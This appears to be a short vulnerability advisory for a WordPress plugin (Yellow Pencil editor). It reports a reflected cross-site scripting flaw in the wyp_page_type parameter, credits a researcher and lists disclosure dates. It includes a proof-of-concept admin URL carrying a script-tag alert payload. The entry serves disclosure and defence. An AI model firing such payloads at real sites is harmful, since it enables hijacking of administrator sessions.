The plugin does not sanitise and escape the wyp_page_type parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/admin.php?page=yellow-pencil-editor&href=1&wyp_page_id=home&wyp_page_type=home&wyp_mode=single&wyp_page_type=<script>alert(/XSS/)</script>
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2022-01-03 (about 1 years ago)
2022-01-03 (about 1 years ago)
2022-09-26 (about 4 months ago)